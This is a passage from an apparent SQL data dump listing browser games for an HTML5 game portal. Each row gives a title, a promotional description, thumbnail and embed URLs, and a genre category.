(603, 'Hidden Objects Futuristic', 'Hidden Objects Futuristic takes you to the far future. Despite advanced technology, there\'s still much garbage laying around. Find all objects on the screen before the time runs out. 16 levels full of items to get cleaned.', 'https://img.gamedistribution.com/ef7de887329948df8844a268fce336ec-512x384.jpeg', 'https://html5.gamedistribution.com/ef7de887329948df8844a268fce336ec/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/ef7de887329948df8844a268fce336ec-512x512.jpeg', 0, ''),
(604, 'Elite Ghost Sniper', 'Elite Ghost Sniper features vast combat area where you are elite sniper and your mission is to shoot all enemy forces on the battlefield in order to successfully complete each level.', 'https://img.gamedistribution.com/4e12dfa54afc465bad5b86e2a5a328af-512x384.jpeg', 'https://html5.gamedistribution.com/4e12dfa54afc465bad5b86e2a5a328af/', '0', 'Shooter', 0, 0, '', 0, ''),
(605, 'Bubble Cave', 'Bubble Cave is a unique 3 match game that anyone can enjoy! Different bubbles are falling down from the top. You have to match 3 bubbles of same color by rotating the cave center. Watch for special bubbles which can make the difference during gameplay. Destroy bubbles before they reach cave border.', 'https://img.gamedistribution.com/f7b8c591588d4f229d1c8c56872952a8-512x384.jpeg', 'https://html5.gamedistribution.com/f7b8c591588d4f229d1c8c56872952a8/', '0', 'Bubble Shooter', 0, 0, '', 0, ''),
(606, 'Granny Hidden Skull Shadows', 'Granny Hidden Skull Shadows is a free online hidden object game. A certain area will appear on the screen in front of you. You will have to examine it all very carefully. Look for shadows of skull. As soon as you find one of them, just click on it with the mouse. Thus, you will select the given item and get points for it. That is 10 hidden skull shadows on 6 levels.', 'https://img.gamedistribution.com/0d782585d4dd4ae1a46169af0e74473f-512x384.jpeg', 'https://html5.gamedistribution.com/0d782585d4dd4ae1a46169af0e74473f/', '0', 'Adventure', 0, 0, 'https://img.gamedistribution.com/0d782585d4dd4ae1a46169af0e74473f-1280x550.jpeg', 0, ''),
(607, 'Beach Volley Ball Jigsaw', 'This is jigsaw game with images of volleyball on beach. select the difficult that you wanna play and put the pieces in right place to get the image with Volleyball Beach. ', 'https://img.gamedistribution.com/646ae9117d9a4dc89f5e82507866ff3b-512x384.jpeg', 'https://html5.gamedistribution.com/646ae9117d9a4dc89f5e82507866ff3b/', '0', 'Puzzle', 0, 0, '', 0, ''),
(608, 'Boat Coordinates', 'Guide your boat to the finish line by guiding it using x and y coordinates.  Pick up all of the buoys while avoiding crashing into land and other boats.  Simple to play, just tap the arrow buttons to adjust the x and y values and then click the Move button to get the boat going to that location.  And be on the lookout for other boats some of which are quite large!  Complete all 10 levels to win the game. ', 'https://img.gamedistribution.com/45819693901e4957b14b616c6cc5beaa-512x512.jpeg', 'https://html5.gamedistribution.com/45819693901e4957b14b616c6cc5beaa/', '0', 'Educational', 0, 0, 'https://img.gamedistribution.com/45819693901e4957b14b616c6cc5beaa-1280x550.jpeg', 0, ''),
(609, 'Car wash', 'So, today our car wash is very popular. Lots of cars of various models came here and are waiting in line. Your baby only needs to choose a favourite one, wash it using detergents, a sponge and water, wipe and dry. After all our car wash is well-equipped and will help your child cope with the task. Here is everything for washing a car, cleaning it, polishing it, painting and tuning.    \nAfter a thorough washing using one’s imagination a car enthusiast can paint a car in any color, change wheels and apply a bright colorful sticker to distinguish it from the rest. This will give a car more attractive look and personality.    \nThe car wash game will help your child to develop fine motor skills of hands, attention and perseverance, to learn colors. It will give your baby a concept how to wash and paint a car. Your child can have an unforgettable time creating something by one’s own.    \n', 'https://img.gamedistribution.com/5d59982833234c68bb5ab693c6ef72c4-512x384.jpeg', 'https://html5.gamedistribution.com/5d59982833234c68bb5ab693c6ef72c4/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(610, 'Impossible Cars Punk Stunt', 'Impossible Cars Punk Stunt is an amazing 3D car driving game developed by Playnec with 11 racing cars. It is very enjoyable to drive dazzling vehicles with improved vehicle physics. Impossible Cars Punk Stunt also has 2 game modes. You can race against time on 22 great racing maps in \"CAREER MODE\" or show your skills in the huge \"FREE MODE\" area.', 'https://img.gamedistribution.com/4550451180364cc2a51d213a72c9a1ea-512x384.jpeg', 'https://html5.gamedistribution.com/4550451180364cc2a51d213a72c9a1ea/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/4550451180364cc2a51d213a72c9a1ea-1280x720.jpeg', 0, ''),
(611, 'Little Ballerinas Coloring', 'Little Ballerinas Coloring, hey girls, would you like to enter the magical world of ballerinas and color this fun world? Click now to create creative pictures with your crayons.', 'https://img.gamedistribution.com/aac35613bd514c3aa28bb7834c3aa4cd-512x384.jpeg', 'https://html5.gamedistribution.com/aac35613bd514c3aa28bb7834c3aa4cd/', '0', 'Art', 0, 0, '', 0, ''),
(612, 'Just Follow My Lead', 'Just Follow My Lead - The simple, yet addictive, brain training game.\n\nThink you\'ve got a good memory? Prove it!\n\nSimply tap the coloured circles in the correct sequence, how hard could it be?!', 'https://img.gamedistribution.com/42f63c3eb8bb4773a7b55451d702505e-512x384.jpeg', 'https://html5.gamedistribution.com/42f63c3eb8bb4773a7b55451d702505e/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/42f63c3eb8bb4773a7b55451d702505e-1280x550.jpeg', 0, ''),
(613, 'Wizard Vs Orcs', 'A flock of orcs are coming. The safety of the magical kingdom is at stake. You are a powerful wizard, use your magic to defeat the orcs to protect your magical kingdom. \n36 levels to play! Enjoy!', 'https://img.gamedistribution.com/541a052f8d794f119e93438e8abc414d-512x340.jpeg', 'https://html5.gamedistribution.com/541a052f8d794f119e93438e8abc414d/', '0', 'Casual', 0, 0, '', 0, ''),
(614, 'Castle Slots', 'On start of the game, you will need to configure the settings of the gaming machine, by putting the number of lines which will be determined as the winning combinations, and the size of the bet. During the game will appear the possibility of the bonus game, and you need to choose three subjects out of 5. This is interesting fun slot game with medieval theme. Heave fun.', 'https://img.gamedistribution.com/fdc7b4e2b3e548d0b3068156c3dd514e-512x384.jpeg', 'https://html5.gamedistribution.com/fdc7b4e2b3e548d0b3068156c3dd514e/', '0', 'Strategy', 0, 0, '', 0, ''),
(615, 'Eternal Fury', 'A strategic turn-based RPG in Html 5 that combines SLG action and classic interactions. Players can summon random acquisitions of different quality mercenaries and customize the base attributes of the mercenary growth system. The game with different genres perfectly combined, will definitely blow your mind!', 'https://img.gamedistribution.com/6f6471ecbc2447d29aa1173e591448e3-512x384.jpeg', 'https://html5.gamedistribution.com/6f6471ecbc2447d29aa1173e591448e3/', '0', 'Strategy', 0, 0, 'https://img.gamedistribution.com/6f6471ecbc2447d29aa1173e591448e3-1280x720.jpeg', 0, ''),
(616, 'Roshambo', 'One of the popular classic games Rashombo is with you with its colorful graphics! A game with both touch and keyboard controls. Another known name of the game is Rock Paper Scissors. Try to anticipate your friend\'s or computer\'s moves. The one who reaches 3 score first, wins the game. Try this classic game now!', 'https://img.gamedistribution.com/359f28f82f6446a4afaa932adf80a3e4-512x384.jpeg', 'https://html5.gamedistribution.com/359f28f82f6446a4afaa932adf80a3e4/', '0', 'Battle', 0, 0, 'https://img.gamedistribution.com/359f28f82f6446a4afaa932adf80a3e4-1280x550.jpeg', 0, ''),
(617, 'Funny Hair Salon', 'George\'s hair is in a no bueno situation. His scalp is full of mites and pimps. The only way to fix his hair is going to the salon. Let\'s cure his scalp and plant new hair to his head, so he can show his true outter beauty!', 'https://img.gamedistribution.com/ce8a0bdacb3e4f92a58f417dcd552030-512x384.jpeg', 'https://html5.gamedistribution.com/ce8a0bdacb3e4f92a58f417dcd552030/', '0', 'Care', 0, 0, 'https://img.gamedistribution.com/ce8a0bdacb3e4f92a58f417dcd552030-1280x550.jpeg', 0, ''),
(618, 'Clara Cosmetic Surgery', 'The beautiful girl Clara met the sudden pathetic accident and her face completely changed. So she needs cosmetic surgery on her face. Would be interested to be her doctor and finally choose the best outfit for her. Here you go!', 'https://img.gamedistribution.com/9ef59b96898247f99a5202c48359bf5d-512x384.jpeg', 'https://html5.gamedistribution.com/9ef59b96898247f99a5202c48359bf5d/', '0', 'Care', 0, 0, '', 0, ''),
(619, ' Biryani Recipes and Super Chef Cooking Game ', 'Chicken Biryani recipe is a rice recipe of Southern Asian integrated rice dish of the Hyderabad Indian Food and Pakistan Food. It is popular throughout the Indo Pak. \nThis Desi continental food is commonly served in dinner. Mostly Served in Pakistani Weddings and Indian Weddings on Mehndi Event.\n\nMughal Chicken Biryani is the most eaten food in Pakistan, India, Punjab, and Hyderabad it is made with rice, chicken curry, mutton, or beef butt mostly it is served with chicken curry. \nHyderabadi Biryani recipe is very simple, just follow given recipes in the game we have all world-famous biryani recipes like Chicken Biryani Maker, Sindhi Biryani Maker, Bombay Biryani cooking, \n\nThis Indian Food is very Famous in Hyderabad\nThose who do not like meat luckily vegetable biryani recipe in Hindi are there to serve us. Mix vegetable rice is one of the favorite dishes of mine ☺\nVeg and nonveg food of Bombay by Mughals', 'https://img.gamedistribution.com/6a91510e0bc44a02af20ecf2b272ebc9-512x512.jpeg', 'https://html5.gamedistribution.com/6a91510e0bc44a02af20ecf2b272ebc9/', '0', 'Cooking', 0, 0, 'https://img.gamedistribution.com/6a91510e0bc44a02af20ecf2b272ebc9-1280x720.jpeg', 0, ''),
(620, 'Create Challenge Text Fast', 'You can create \"CHALLENGE\" text fats by dragging and dropping the letters in correct order before time out.\nYou have to be speed to make this text.\nEnjoy!', 'https://img.gamedistribution.com/ce9c98a1e94b4385a48b31422178091b-512x384.jpeg', 'https://html5.gamedistribution.com/ce9c98a1e94b4385a48b31422178091b/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/ce9c98a1e94b4385a48b31422178091b-1280x550.jpeg', 0, ''),
(621, 'Tow Trucks Memory', 'Tow Trucks Memory is puzzle memory game where you need to memorize all images and then to find them all before time run out. As the levels increase, time will pass faster, so you have to think faster to find all the images with tow trucks. ', 'https://img.gamedistribution.com/ec039b2409b843f0a46ad705cafb008d-512x384.jpeg', 'https://html5.gamedistribution.com/ec039b2409b843f0a46ad705cafb008d/', '0', 'Puzzle', 0, 0, '', 0, ''),
(622, 'Save Pilot ', 'In this game you need to control the plane and to avoid bullets and rockets. Collect shields and speeds and sometimes you can shoot on your opponent too. Navigate the plane with finger on your screen or with mouse.', 'https://img.gamedistribution.com/facf30b0bb014cbf90220fbc6dca7dfe-512x384.jpeg', 'https://html5.gamedistribution.com/facf30b0bb014cbf90220fbc6dca7dfe/', '0', 'Puzzle', 0, 0, '', 0, ''),
(623, 'BTS Doggy Coloring Book', 'BTS Doggy Coloring Book is fun coloring game for kids and you can play it for free. Play it direct in your browser or mobile device. Start coloring now with this online coloring game for toddlers and kids. It\'s very fun and easy to use.  These free games for babies and toddlers online are designed to be played on computer, smartphone or tablet without downloading anything. Perfect painting game for babies, simple, colorful, beautiful and sensory. Have fun olaying and come back for more!', 'https://img.gamedistribution.com/df1ec6686f7947da8c4559c628d8cf9f-512x384.jpeg', 'https://html5.gamedistribution.com/df1ec6686f7947da8c4559c628d8cf9f/', '0', 'Art', 0, 0, '', 0, ''),
(624, 'Pixel Combat Fortress', 'Pixel Combat Fortress Multiplayer where you will be able to simulate a pixel real war fighting against real players around the world. Our fps battlefield game will make you love the realistic tanks and cool effects on bullet and rocket explosion and also when destroy a tank will show nice destroyed rag doll, don\'t forget for our helicopter where you can drive and also can enter your friends inside and fly together, the cars can carry players on back and can speed up fast and drifting in map and will gain some XP to buy vehicle in map or also by gain XP can rank fast and unlock some powerful vehicle. I\'m not bothered you with more feature on this game, you need to discover what is fun and addictive here. Have fun!', 'https://img.gamedistribution.com/374a1722bb2846da9db1190810e3ba35-512x384.jpeg', 'https://html5.gamedistribution.com/374a1722bb2846da9db1190810e3ba35/', '0', 'Battle', 0, 0, '', 0, ''),
(625, 'Stickman Fighting 2 Player', 'Stickman Fighting 2 Player! A fun, addictive and Multiplayer warriors with realistic Ragdoll physics games.\nTest your warrior games skill and kill the enemy until the last drop of your blood! An epic Shadow 2 player games. You’ll get the heroic western cowboy fight with full of action and speed. Put your reflex and kill your opponents! real Boxing games, punches, catches, and Kicks! Stickman fighter physics games! Experience realistic Ninja fighting games atmosphere in the best Stickman games with ragdoll Doodle style survival games.\nInstructions:\n1 player - Arrows\n2 player - WASD\n', 'https://img.gamedistribution.com/e61f3d39edb14176973383e5be036bb8-512x384.jpeg', 'https://html5.gamedistribution.com/e61f3d39edb14176973383e5be036bb8/', '0', 'Battle', 0, 0, '', 0, ''),
(626, 'Cook Up! Yummy Kitchen Cooking', 'Wanna be a master chef of your own kitchen empire? Check out Cook Up! Yummy Kitchen Cooking Game! This is the place where you can try all the cookbook recipes and make delicious meals in your yummy kitchen.', 'https://img.gamedistribution.com/4ca8d14997054165be8234d9c4fb4e2e-512x384.jpeg', 'https://html5.gamedistribution.com/4ca8d14997054165be8234d9c4fb4e2e/', '0', 'Cooking', 0, 0, '', 0, ''),
(627, 'Super Color Lines', 'Play the game Super Color Lines and test your intelligence. In the game, in front of your screen, the playing field will be visible divided into an equal number of cells. In some of the cells square chips of different colors will be visible. You have to carefully place one line in five objects from the chips of the same color. Moving of the objects is by clicking on the selected item and move to the location you specified. As soon as the line is set with 5 objects will disappear from the screen and points will be awarded to you.Heave fun!', 'https://img.gamedistribution.com/287ee07b4d344447b3253093baaf1f97-512x384.jpeg', 'https://html5.gamedistribution.com/287ee07b4d344447b3253093baaf1f97/', '0', 'Casual', 0, 0, '', 0, ''),
(628, 'Tennis Open 2020', 'The excitement and flair of the tennis world are ready for you! Pick up a racket and ace your way through every significant tennis event in the world! Can you win? Can you overcome it all? Train hard, play hard and become an unbeatable legend. Reach the top and write history. Prove yourself and triumph!\n', 'https://img.gamedistribution.com/232601ca319b4f76bcb47bd824c1625b-512x340.jpeg', 'https://html5.gamedistribution.com/232601ca319b4f76bcb47bd824c1625b/', '0', 'Sports', 0, 0, 'https://img.gamedistribution.com/232601ca319b4f76bcb47bd824c1625b-1280x550.jpeg', 0, ''),
(629, 'Chibi DottedGirl Coloring Book', 'Welcome young artist! Show everyone your talents. Rather color these cute chibi-style superheroes. Use bright colors and your imagination. Ladybug and her friends will not leave you indifferent. Take a screenshot and share the result with your friends!', 'https://img.gamedistribution.com/b8fc9485dd1f4bababdcda2fb3483cdf-512x384.jpeg', 'https://html5.gamedistribution.com/b8fc9485dd1f4bababdcda2fb3483cdf/', '0', 'Dress-up', 0, 0, 'https://img.gamedistribution.com/b8fc9485dd1f4bababdcda2fb3483cdf-1280x550.jpeg', 0, ''),
(630, 'Pizza Maker My Pizzeria', 'Pizza Maker: My Pizzeria Game is the ideal fast food cooking game in which you can make pizza for your customers! Take every “pizza order call”, make and sell pizza and get a review from the customers. Make sure not to disappoint them, follow the recipe carefully and deliver pizza on time!', 'https://img.gamedistribution.com/a5d3ddbb323042be8289a5db301fd965-512x384.jpeg', 'https://html5.gamedistribution.com/a5d3ddbb323042be8289a5db301fd965/', '0', 'Casual', 0, 0, '', 0, ''),
(631, 'Baby Taylor Good Habits', 'This is a normal day for Baby Taylor. She will show us some good habits in daily life. If you want to learn these following habits, join us. Put clothes on correctly; Correct behaviors of a picky eater; Put away toys and books on their own; Wash hands often, routinely wash face. Let’s try these things with Taylor together.', 'https://img.gamedistribution.com/01e27f11c8c749d7a756beb32b0ea14a-512x384.jpeg', 'https://html5.gamedistribution.com/01e27f11c8c749d7a756beb32b0ea14a/', '0', 'Care', 0, 0, '', 0, ''),
(632, 'Jewelry Shop', 'Jewelry Shop is a fun webgl game with amazing graphics and multiple game modes. Dress your girl and participate in a beauty contest! \nPlay Jewelry Shop for a great shopping experience! ', 'https://img.gamedistribution.com/9abe6bffe7354c88b976e6fdc76c0ef2-512x512.jpeg', 'https://html5.gamedistribution.com/9abe6bffe7354c88b976e6fdc76c0ef2/', '0', 'Dress-up', 0, 0, '', 0, ''),
(634, 'Pou Online', 'Do you have what it takes to take care of your very own alien pet? Feed and take care of Pou.', 'https://img.gamemonetize.com/jyeazqa0x7ym5xcq22g9mgv74s5tift1/512x384.jpg', 'https://html5.gamemonetize.com/jyeazqa0x7ym5xcq22g9mgv74s5tift1/', '0', 'Puzzles', 0, 0, '', 0, ''),
(636, 'Among Us Space Rush', 'Play Among Us Rush now on kiz10.com !!! A new game comes to the best style and with the characters of Among Us run and do not stop running through the dangerous platforms of the different levels of the game, be very careful because you could fall off the cliff or collide with different obstacles such as bombs, objects that will block your way. Have fun with this new addictive entertaining game exclusive to kiz10.com !! remember that we have exclusive games every week and new games for free every day. In Among Us Rush the objective of the game is to reach the goal of each level with the greatest number of characters but be careful it is not as easy as it seems on your way you will run into thousands of dangers, try to finish each level with a better score on your On the way you can unlock different achievements with which you can improve your gaming skills or unlock many more gifts. Enjoy this addictive and exciting adventure game play for free on your favorite mobile device, tablet or desktop computer. The game is very easy to play, simply control the characters with the mouse or by touching the screen of your mobile device.', 'https://img.gamemonetize.com/3iaqi4b196ujgycgvjnxhegwcj0y4617/512x384.jpg', 'https://html5.gamemonetize.com/3iaqi4b196ujgycgvjnxhegwcj0y4617/', '0', 'Hypercasual', 0, 0, '', 0, ''),
(637, 'Rabbit Punch Rabbit ', 'Are you ready to dive into the exciting world of reaction and competition? Then this game is created especially for you! Whether you prefer to battle a car or a friend on the same device, youre guaranteed a dose of adrenaline and fun every time you touch the screen. The hare is our main character. He will appear at the most unexpected moment and only for a moment. Your job is to be quick and hit him before he disappears. After all, the one who manages to hit the hare first will be rewarded with points. In this game, reaction is your main tool, and you must use it to its full potential to win.', 'https://img.gamemonetize.com/pgdivazlfi4x3u9byflherbvhelzpif8/512x384.jpg', 'https://html5.gamemonetize.com/pgdivazlfi4x3u9byflherbvhelzpif8/', '0', 'Clicker', 0, 0, '', 0, ''),
(638, '12 MiniBattles', '12 MiniBattles is a fun multiplayer game where you and a friend can play against each other on a variety of games. This physics style game has different game types that you can play at random including a soccer match and sniper warfare. All of the different games have a one-button control system making them easy to play for the maximum amount of fun. This addictive gameplay will keep you and a friend entertained for hours. Play all the games and spend hours getting the better of your friends. Have fun and win every game! 12 MiniBattles was the second runner-up in the 2018 CrazyGames Developer contest. The jury of three independent game experts loved the 2 player setup and varied gameplay with retro graphics. &quot;Party Games are a hit or miss, this one is a hit. The concepts are well executed and I really like the game\'s quick pacing and single button input.&quot;', 'https://img.gamemonetize.com/nuiyi3o2g6fktyjda55g42v3qe5a3hbq/512x384.jpg', 'https://html5.gamemonetize.com/nuiyi3o2g6fktyjda55g42v3qe5a3hbq/', '0', 'Arcade', 0, 0, '', 0, ''),
(640, 'Doc Mcstuffins Endless Runner Girl', 'Doc Mcstuffins is here to through the monster road! There are many monsters ahead. How far can she run?', 'https://img.gamedistribution.com/9027ab845ae24c3d9ed01265c99be3f4-512x384.jpeg', 'https://html5.gamedistribution.com/9027ab845ae24c3d9ed01265c99be3f4/', '0', 'Adventure', 0, 0, '', 0, ''),
(641, 'Dotted Girl Skin Doctor', 'Dotted Girl forgot she is allergic to strawberries and ate a couple! Rush to the hospital, because now her face is full of eczemas, rashes and redness from the allergy. Learn how to treat each and every problem on her face using fun lasers and medical tools. With a little help from you, Dotted Girl will get her flawless skin back and fully recover! ', 'https://img.gamedistribution.com/f6c9607f6d804b8f9438ddd3b45ddbc4-512x384.jpeg', 'https://html5.gamedistribution.com/f6c9607f6d804b8f9438ddd3b45ddbc4/', '0', 'Dress-up', 0, 0, '', 0, ''),
(642, 'Car Drifting Xtreme', 'Car Drifting Xtreme is the most realistic drift racing game on mobile devices, and yet easy to control and fun to play thanks to an innovative drift helper.\nGet ready to drive high performance cars (turbo or naturally aspirated) and make them drift at high speed in tracks designed specifically for drift racing.', 'https://img.gamedistribution.com/5a92dc0fb6b74e23910a4d37d2edf325-512x384.jpeg', 'https://html5.gamedistribution.com/5a92dc0fb6b74e23910a4d37d2edf325/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/5a92dc0fb6b74e23910a4d37d2edf325-1280x550.jpeg', 0, ''),
(643, 'Real Gangster City Crime Vegas 3D 2018', 'Welcome to Real Gangster City Crime Vegas 3D 2018, Explore the city of vegas of gangster crime, Become the most notable gangsters in vegas city crime of US Streets by using guns, cars, bikes, planes, trucks, buses. As a real gangster in this finest of vegas crime games play as a crime lord to deal with vegas gangsters to be one of the best crime gangster. Instructions: WASD - move.  LKM - atack. Shift - run. Space - jump. F - use car', 'https://img.gamedistribution.com/d7ce1cdb67f54735a554763d6cdf871f-512x384.jpeg', 'https://html5.gamedistribution.com/d7ce1cdb67f54735a554763d6cdf871f/', '0', 'Battle', 0, 0, '', 0, ''),
(644, 'Basketball', 'Basketball is fun addictive sports game.Show your skills to shoot the basket.', 'https://img.gamedistribution.com/ea3d950aaaba4233869251ba349219df-512x512.jpeg', 'https://html5.gamedistribution.com/ea3d950aaaba4233869251ba349219df/', '0', 'Basketball', 0, 0, '', 0, ''),
(645, 'BTS Cake Coloring Book', 'BTS Cake Coloring Book is an online game that you can play for free. Back To School Coloring Book is a series of coloring relaxation preschool educational game, which is specially developed for the kids for free. In this game, you can choose different cute images to paint. Hope you can enjoy the process of Back To School Cake Coloring Book. Have fun! ', 'https://img.gamedistribution.com/0b182464126d47a4b369db2705430a5f-512x384.jpeg', 'https://html5.gamedistribution.com/0b182464126d47a4b369db2705430a5f/', '0', 'Art', 0, 0, '', 0, ''),
(646, 'Gangster City Crime', 'Gangster City Crime features:\n- 2 game modes\n- multiple levels', 'https://img.gamedistribution.com/e4b45fcb9b90416e93c5adb87ee2c13f-1280x550.jpeg', 'https://html5.gamedistribution.com/e4b45fcb9b90416e93c5adb87ee2c13f/', '0', 'Shooter', 0, 0, 'https://img.gamedistribution.com/e4b45fcb9b90416e93c5adb87ee2c13f-512x384.jpeg', 0, ''),
(647, 'Control The Truck', 'Click when the truck need to turn. Try to drive long as you can without crashing. Be careful sometimes truck will move uncontrollable, so you need to be concentrate.', 'https://img.gamedistribution.com/f835314c72dd42ecb572c2bff7d0aea7-512x384.jpeg', 'https://html5.gamedistribution.com/f835314c72dd42ecb572c2bff7d0aea7/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/f835314c72dd42ecb572c2bff7d0aea7-1280x550.jpeg', 0, ''),
(648, 'EG Crossword Kids', 'EG Crossword for kids - HTML5 games. Choose different number. Ecaps Games with tons of games for all ages and bringing fun to player Play free online games Have fun!', 'https://img.gamedistribution.com/3c7adf6eecfa448db0f45834bb4ee91f-512x384.jpeg', 'https://html5.gamedistribution.com/3c7adf6eecfa448db0f45834bb4ee91f/', '0', 'Match-3', 0, 0, '', 0, ''),
(649, 'Castle Puzzle', 'Castle Puzzle is fun addictive puzzle game.There is many blocks in the castle you have remove all the blocks but be careful while removing the blocks one mistake in removing the blocks will collapse your castle.So enjoy this fun puzzle game.', 'https://img.gamedistribution.com/bc463f4887194a599a148f6fdfbe709c-512x384.jpeg', 'https://html5.gamedistribution.com/bc463f4887194a599a148f6fdfbe709c/', '0', 'Puzzle', 0, 0, '', 0, ''),
(650, 'Taxi Simulator 2019', 'Start your day behind the wheel of a yellow taxicab! This is no ordinary driving game; compete with other drivers for customers! Use your skills to navigate tight, urban streets and crowded roads to reach destinations under the time limit. Compete for parking spots and avoid crashing into other vehicles while sharing the road with trucks, jeeps, and motorbikes! \n', 'https://img.gamedistribution.com/1cb8f33bd1d940d794ecf01ac878a2c6-512x384.jpeg', 'https://html5.gamedistribution.com/1cb8f33bd1d940d794ecf01ac878a2c6/', '0', 'Simulation', 0, 0, '', 0, ''),
(651, 'Classic Spider Solitaire', 'Classic Spider Solitaire is fun addictive card game.Play Classic Spider Solitaire with 1,2 or 4 suits and remove all the cards from the board.', 'https://img.gamedistribution.com/3ff269efa47241d68808d3ba9f822a41-512x512.jpeg', 'https://html5.gamedistribution.com/3ff269efa47241d68808d3ba9f822a41/', '0', 'Cards', 0, 0, '', 0, ''),
(652, 'Hidden Star Emoji', 'Hidden star Emoji is hidden object game with interesting levels. Find all the hidden emoji stars and move to next level and let\'s see your object finding skills. Have a wonderful game.', 'https://img.gamedistribution.com/de81153e0e5d4a48ae433f866affefb9-512x384.jpeg', 'https://html5.gamedistribution.com/de81153e0e5d4a48ae433f866affefb9/', '0', 'Adventure', 0, 0, '', 0, ''),
(653, 'Sentry Guardian', 'Hordes of demonic army are heading on a conquest. As the bravest gate guardian, it\'s your duty to keep the mainland safe from any threat. Defeat the evil ce, upgrade your skills and get stronger!', 'https://img.gamedistribution.com/2f46726c6e344176825cb37b17634b58-512x384.jpeg', 'https://html5.gamedistribution.com/2f46726c6e344176825cb37b17634b58/', '0', 'Strategy', 0, 0, '', 0, ''),
(654, 'Super Doll Mission Accident ER', 'Super Doll couldn\'t let the villain get away in her last mission and now she needs a little help from the doctor! Go to the emergency room with her and see what you can do to treat her wounds and make her feel better. Use awesome an awesome laser to kill the bacteria and put on stitches so that the scratch heals faster. Make sure your patient takes her vitamins and the superhero doll will be home in no time, ready to get some rest and fully recover!', 'https://img.gamedistribution.com/abccea0c5fcc4951a64c76902a5368f8-512x384.jpeg', 'https://html5.gamedistribution.com/abccea0c5fcc4951a64c76902a5368f8/', '0', 'Dress-up', 0, 0, '', 0, ''),
(655, 'Walk Crazy', 'Passing through the crosswalk while the car not waiting for you is such a dangerous thing, but some people just want to seek this kind of exciting sense, tap and hold of the left or right side can speed up or down, try to avoid crashing on the cars, and live as long as you can, collect coins while walking, it may bring you lucky. Have fun!', 'https://img.gamedistribution.com/47b22b5a7f284a05877436cd345ab0af-512x384.jpeg', 'https://html5.gamedistribution.com/47b22b5a7f284a05877436cd345ab0af/', '0', 'Adventure', 0, 0, 'https://img.gamedistribution.com/47b22b5a7f284a05877436cd345ab0af-1280x550.jpeg', 0, ''),
(656, 'Fantasy Connect Deluxe', 'Connect similar items to get points in this time-bound game. Make big chains ( 7 or 10 ) to get the powerups. press and move your finger tip or mouse pointer on the similar blocks adjacent to each other to select them and release the press when you have selected all of them.', 'https://img.gamedistribution.com/2d665f1a5bda4d9c8f9aab45ab5489bd-512x384.jpeg', 'https://html5.gamedistribution.com/2d665f1a5bda4d9c8f9aab45ab5489bd/', '0', 'Mahjong & Connect', 0, 0, 'https://img.gamedistribution.com/2d665f1a5bda4d9c8f9aab45ab5489bd-1280x550.jpeg', 0, ''),
(657, 'Geometry Jump Bit by Bit', 'Geometry Jump Bit by Bit, which is very popular on GooglePlay Store and App Store, has a very different and very important feature from its peers. Geometry dash can be quite annoying at times. that\'s why we\'ve added acceleration and lagged. After selecting the section, you can play the game at the speed you want by pressing 0.2x, 0.5x, 1x, 2x, buttons on the game screen. ', 'https://img.gamedistribution.com/6c6c40fcb3d246ddafaf93d0ef4c4666-512x512.jpeg', 'https://html5.gamedistribution.com/6c6c40fcb3d246ddafaf93d0ef4c4666/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/6c6c40fcb3d246ddafaf93d0ef4c4666-1280x550.jpeg', 0, ''),
(658, 'Mexican Master Chef', 'Are you street food lover? If yes, then join us our new game Mexican Master Chef, a virtual cooking fun game. There are french fries stall, hotdog stall, pizza stall, burger stall, noodles stall and churros stall! This sounds so amazing that you can get all yummy food at only one place. Cooking fever will start in this carnival food festival. Get ready for this.', 'https://img.gamedistribution.com/29276b9465444aad8b6529b4a7a09a46-512x384.jpeg', 'https://html5.gamedistribution.com/29276b9465444aad8b6529b4a7a09a46/', '0', 'Cooking', 0, 0, '', 0, ''),
(659, 'Jumping Skill Master', 'great jumping game arcade type you have many possibilities and option to score higher and enjoy the game!    Be nimble… be quick… and score higher', 'https://img.gamedistribution.com/a40947c835494628be6f716351244740-512x384.jpeg', 'https://html5.gamedistribution.com/a40947c835494628be6f716351244740/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/a40947c835494628be6f716351244740-1280x550.jpeg', 0, ''),
(660, 'Bubble Shooter Gold Mining', 'It is a classical bubble shooter game. Mine the gold hidden among the bubbles. There will be 60 challenging levels.  In each level you will find a different challenge with \'different type of bubbles and power ups\'. To complete a level you must mine all the gold pieces appearing among the bubbles. Shoot the bubble on the board to make groups of 3 or more bubbles of the same color. You must complete a level within allowed time. You will get better score if you complete the level early.', 'https://img.gamedistribution.com/e62af5ce035648edb93690422044e6bb-512x384.jpeg', 'https://html5.gamedistribution.com/e62af5ce035648edb93690422044e6bb/', '0', 'Bubble Shooter', 0, 0, 'https://img.gamedistribution.com/e62af5ce035648edb93690422044e6bb-1280x550.jpeg', 0, ''),
(661, 'Water Surfer Bus', 'Water Surfer Bus features:\n- multiple levels\n- multiple bus models', 'https://img.gamedistribution.com/25f54b4acede4687a08ef6ee77bf14b6-1280x550.jpeg', 'https://html5.gamedistribution.com/25f54b4acede4687a08ef6ee77bf14b6/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/25f54b4acede4687a08ef6ee77bf14b6-512x384.jpeg', 0, ''),
(662, 'Gems Merge', 'Gems Merge is fun addictive casual game. Merge the two same number gems to increment the gems number.', 'https://img.gamedistribution.com/97d150064ca0430783628ecdf85e53a1-512x384.jpeg', 'https://html5.gamedistribution.com/97d150064ca0430783628ecdf85e53a1/', '0', 'Merge', 0, 0, '', 0, ''),
(663, 'Combine It', 'Change the moving blocks to own blocks and place it in the corresponding position.', 'https://img.gamedistribution.com/a10445b9d01b465f972c3f076acaa402-512x384.jpeg', 'https://html5.gamedistribution.com/a10445b9d01b465f972c3f076acaa402/', '0', 'Casual', 0, 0, '', 0, ''),
(664, 'Classic Match3', 'Your Gems buddies are here and do not expect from them anything less than long hours of fun and entertainment.Classic Match3 is fun addictive match3 game.Match 3 or more gems to play the  game.', 'https://img.gamedistribution.com/cbec29358df940abb62ae923424e8fd3-512x384.jpeg', 'https://html5.gamedistribution.com/cbec29358df940abb62ae923424e8fd3/', '0', 'Puzzle', 0, 0, '', 0, ''),
